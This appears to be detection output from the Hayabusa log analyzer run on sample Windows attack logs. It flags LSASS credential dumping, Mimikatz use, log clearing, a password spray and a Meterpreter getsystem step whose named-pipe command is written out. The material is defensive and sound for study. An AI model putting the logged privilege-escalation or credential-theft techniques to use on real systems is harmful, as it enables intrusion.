+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,high,Mimikatz Detection LSASS Access,,rules/sigma/deprecated/sysmon_mimikatz_detection_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:46:15.215 +09:00,IEWIN7,1,informational,Process Creation,Command: cmd.exe /c echo msdhch > \\.\pipe\msdhch  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx
+2019-04-30 16:46:15.215 +09:00,IEWIN7,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx
+2019-04-30 16:46:15.215 +09:00,IEWIN7,1,high,Meterpreter or Cobalt Strike Getsystem Service Start,,rules/sigma/process_creation/win_meterpreter_or_cobaltstrike_getsystem_service_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx
+2019-04-30 21:43:43.784 +09:00,IEWIN7,8,high,Password Dumper Remote Thread in LSASS,,rules/sigma/create_remote_thread/sysmon_password_dumper_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
+2019-04-30 21:43:43.784 +09:00,IEWIN7,8,high,Password Dumper Remote Thread in LSASS,,rules/sigma/create_remote_thread/sysmon_password_dumper_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
+2019-04-30 21:43:43.784 +09:00,IEWIN7,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
+2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
+2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
+2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
+2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
+2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
+2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
+2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
+2019-05-01 03:08:22.618 +09:00,Sec504Student,1102,high,Security log was cleared,User: Sec504,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
+2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,Unknown process used a high privilege,Process: C:\Tools\mimikatz\mimikatz.exe  :  User: Sec504  :  LogonID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
+2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
+2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
+2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,Unknown process used a high privilege,Process: C:\Tools\mimikatz\mimikatz.exe  :  User: Sec504  :  LogonID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
+2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
+2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
+2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,Unknown process used a high privilege,Process: C:\Tools\mimikatz\mimikatz.exe  :  User: Sec504  :  LogonID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
+2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
+2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
+2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,Unknown process used a high privilege,Process: C:\Tools\mimikatz\mimikatz.exe  :  User: Sec504  :  LogonID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
+2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
+2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
+2019-05-01 04:27:00.297 +09:00,DESKTOP-JR78RLP,1102,high,Security log was cleared,User: jwrig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:02.847 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: Administrator  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:02.847 +09:00,-,-,medium,Password Spray,[condition] count(TargetUserName) by IpAddress >= 5 in timeframe [result] count:41 TargetUserName:thessman/edygert/rbowes/jwright/celgee/ebooth/cmoody/tbennett/melliott/jlake/cfleener/psmith/drook/dpendolino/Administrator/wstrzelec/mdouglas/cspizor/cragoso/bhostetler/jleytevidal/sarmstrong/baker/gsalinas/lschifano/cdavis/jorchilles/bking/ssims/zmathis/econrad/smisenar/eskoudis/mtoussain/dmashburn/kperryman/jkulikowski/bgreenwood/lpesce/sanson/bgalbraith IpAddress:172.16.144.128 timeframe:5m,rules/hayabusa/default/alerts/Security/4648_BruteForce_PasswordSprayDetect.yml,-
+2019-05-01 04:27:03.925 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jwright  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:05.020 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: dpendolino  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:06.085 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: celgee  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:07.171 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: thessman  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:08.254 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: eskoudis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:09.323 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cdavis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:10.377 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: mtoussain  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:11.465 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: lschifano  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:12.549 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bhostetler  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:13.611 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: rbowes  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:14.687 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: ebooth  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:15.750 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cfleener  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:16.841 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cmoody  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:17.922 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: psmith  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:19.035 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jkulikowski  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
